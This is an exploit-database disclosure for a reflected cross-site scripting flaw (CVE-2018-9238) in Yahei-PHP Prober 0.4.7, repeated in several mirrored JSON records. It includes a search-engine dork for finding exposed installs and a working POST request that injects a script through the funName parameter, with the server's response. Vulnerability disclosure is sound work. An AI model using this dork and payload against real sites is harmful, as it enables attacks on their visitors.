ID 1337DAY-ID-30145
Type zdt
Reporter ManhNho
Modified 2018-04-09T00:00:00
Description
Exploit for php platform in category web applications
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Description
-----------------------------------------------------
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
#2. Proof of Concept
-----------------------------------------------------
Request:
POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1
pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
-----------------------------------------------------
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function
Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results
support the position: 错误')</script></table>
#3. References
-----------------------------------------------------
https://pastebin.com/ia7U4vi9
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238
# 0day.today [2018-04-11] #
{"sourceData": "# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting\r\n# Google Dork: intitle:\"Proberv0.\" | inurl:/proberv.php\r\n# Date: 23/03/2018\r\n# Exploit Author: ManhNho\r\n# Vendor Homepage: http://www.yahei.net/\r\n# Software Link: www.yahei.net/tz/tz_e.zip\r\n# Version: 0.4.7\r\n# CVE: CVE-2018-9238\r\n# Tested on: Windows 10 / Kali Linux\r\n# Category: Webapps\r\n \r\n \r\n#1. Description\r\n-----------------------------------------------------\r\nproberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.\r\n \r\n \r\n#2. Proof of Concept\r\n-----------------------------------------------------\r\nRequest:\r\n \r\nPOST /proberv.php HTTP/1.1\r\nHost: <target>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101\r\nFirefox/59.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: <target>/proberv.php\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 186\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\npInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=\r\n \r\n-----------------------------------------------------\r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 22 Mar 2018 16:59:57 GMT\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nVary: Accept-Encoding\r\nContent-Length: 30461\r\n...\r\n<tr>\r\n<td width=\"15%\"></td>\r\n<td width=\"60%\">\r\nEnter the function you want to test:\r\n<input type=\"text\" name=\"funName\" size=\"50\" />\r\n</td>\r\n<td width=\"25%\">\r\n<input class=\"btn\" type=\"submit\" name=\"act\" align=\"right\" value=\"Function\r\nTest\" />\r\n</td>\r\n</tr>\r\n<script>alert('Function')</script><script>alert(\"1\");</script>Test results\r\nsupport the position: \u9519\u8bef')</script></table>\r\n \r\n \r\n#3. References\r\n-----------------------------------------------------\r\nhttps://pastebin.com/ia7U4vi9\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238\n\n# 0day.today [2018-04-11] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/30145", "reporter": "ManhNho", "href": "https://0day.today/exploit/description/30145", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "478be1d6ed9bdf1aa2facb526205163e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "33139050d7e1b12dacd1f7069e63d692"}, {"key": "modified", "hash": "0f00a0a13f0660fdc38b69aa3d2c2098"}, {"key": "published", "hash": "0f00a0a13f0660fdc38b69aa3d2c2098"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "66b62f7df73b9a73b8fe83a45f6bd096"}, {"key": "sourceData", "hash": "6c7cadf02e054dbd76e32df05492d576"}, {"key": "sourceHref", "hash": "a11edc8eb284a82ccfb6677639764b28"}, {"key": "title", "hash": "4fed1d4b61a6a8aaa69030831de5c1e4"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 3, "references": [], "lastseen": "2018-04-11T15:01:13", "published": "2018-04-09T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2018-9238"], "id": "1337DAY-ID-30145", "hash": "6f3d0e6dac3b986ad7e17cddd4592159ea7eb84e4dbe44ac55218fb8415ebd0a", "modified": "2018-04-09T00:00:00", "title": "Yahei PHP Prober 0.4.7 - Cross-Site Scripting Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-04-11T15:01:13"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-9238"]}, {"type": "exploitdb", "idList": ["EDB-ID:44424"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147084"]}], "modified": "2018-04-11T15:01:13"}, "vulnersScore": 5.4}}
{"cve": [{"lastseen": "2019-05-29T18:20:30", "bulletinFamily": "NVD", "description": "proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.", "modified": "2018-05-03T15:06:00", "id": "CVE-2018-9238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9238", "published": "2018-04-04T07:29:00", "title": "CVE-2018-9238", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2018-04-10T01:05:47", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/147084/Yahei-PHP-Prober-0.4.7-Cross-Site-Scripting.html", "id": "PACKETSTORM:147084", "type": "packetstorm", "title": "Yahei PHP Prober 0.4.7 Cross Site Scripting", "sourceData": "`# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting \n# Google Dork: intitle:\"Proberv0.\" | inurl:/proberv.php \n# Date: 23/03/2018 \n# Exploit Author: ManhNho \n# Vendor Homepage: http://www.yahei.net/ \n# Software Link: www.yahei.net/tz/tz_e.zip \n# Version: 0.4.7 \n# CVE: CVE-2018-9238 \n# Tested on: Windows 10 / Kali Linux \n# Category: Webapps \n \n \n#1. Description \n----------------------------------------------------- \nproberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter. \n \n \n#2. Proof of Concept \n----------------------------------------------------- \nRequest: \n \nPOST /proberv.php HTTP/1.1 \nHost: <target> \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 \nFirefox/59.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: <target>/proberv.php \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 186 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \npInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd= \n \n----------------------------------------------------- \nResponse: \n \nHTTP/1.1 200 OK \nServer: nginx \nDate: Thu, 22 Mar 2018 16:59:57 GMT \nContent-Type: text/html; charset=utf-8 \nConnection: close \nVary: Accept-Encoding \nContent-Length: 30461 \n... \n<tr> \n<td width=\"15%\"></td> \n<td width=\"60%\"> \nEnter the function you want to test: \n<input type=\"text\" name=\"funName\" size=\"50\" /> \n</td> \n<td width=\"25%\"> \n<input class=\"btn\" type=\"submit\" name=\"act\" align=\"right\" value=\"Function \nTest\" /> \n</td> \n</tr> \n<script>alert('Function')</script><script>alert(\"1\");</script>Test results \nsupport the position: ee--')</script></table> \n \n \n#3. References \n----------------------------------------------------- \nhttps://pastebin.com/ia7U4vi9 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147084/yaheiphpprober047-xss.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-05-24T14:13:18", "bulletinFamily": "exploit", "description": "Yahei PHP Prober 0.4.7 - Cross-Site Scripting. CVE-2018-9238. Webapps exploit for PHP platform. Tags: Cross-Site Scripting (XSS)", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "id": "EDB-ID:44424", "href": "https://www.exploit-db.com/exploits/44424/", "type": "exploitdb", "title": "Yahei PHP Prober 0.4.7 - Cross-Site Scripting", "sourceData": "# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting\r\n# Google Dork: intitle:\"Proberv0.\" | inurl:/proberv.php\r\n# Date: 23/03/2018\r\n# Exploit Author: ManhNho\r\n# Vendor Homepage: http://www.yahei.net/\r\n# Software Link: www.yahei.net/tz/tz_e.zip\r\n# Version: 0.4.7\r\n# CVE: CVE-2018-9238\r\n# Tested on: Windows 10 / Kali Linux\r\n# Category: Webapps\r\n\r\n\r\n#1. Description\r\n-----------------------------------------------------\r\nproberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.\r\n\r\n\r\n#2. Proof of Concept\r\n-----------------------------------------------------\r\nRequest:\r\n\r\nPOST /proberv.php HTTP/1.1\r\nHost: <target>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101\r\nFirefox/59.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: <target>/proberv.php\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 186\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\npInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=\r\n\r\n-----------------------------------------------------\r\nResponse:\r\n\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 22 Mar 2018 16:59:57 GMT\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nVary: Accept-Encoding\r\nContent-Length: 30461\r\n...\r\n<tr>\r\n<td width=\"15%\"></td>\r\n<td width=\"60%\">\r\nEnter the function you want to test:\r\n<input type=\"text\" name=\"funName\" size=\"50\" />\r\n</td>\r\n<td width=\"25%\">\r\n<input class=\"btn\" type=\"submit\" name=\"act\" align=\"right\" value=\"Function\r\nTest\" />\r\n</td>\r\n</tr>\r\n<script>alert('Function')</script><script>alert(\"1\");</script>Test results\r\nsupport the position: \u9519\u8bef')</script></table>\r\n\r\n\r\n#3. References\r\n-----------------------------------------------------\r\nhttps://pastebin.com/ia7U4vi9\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44424/"}]}
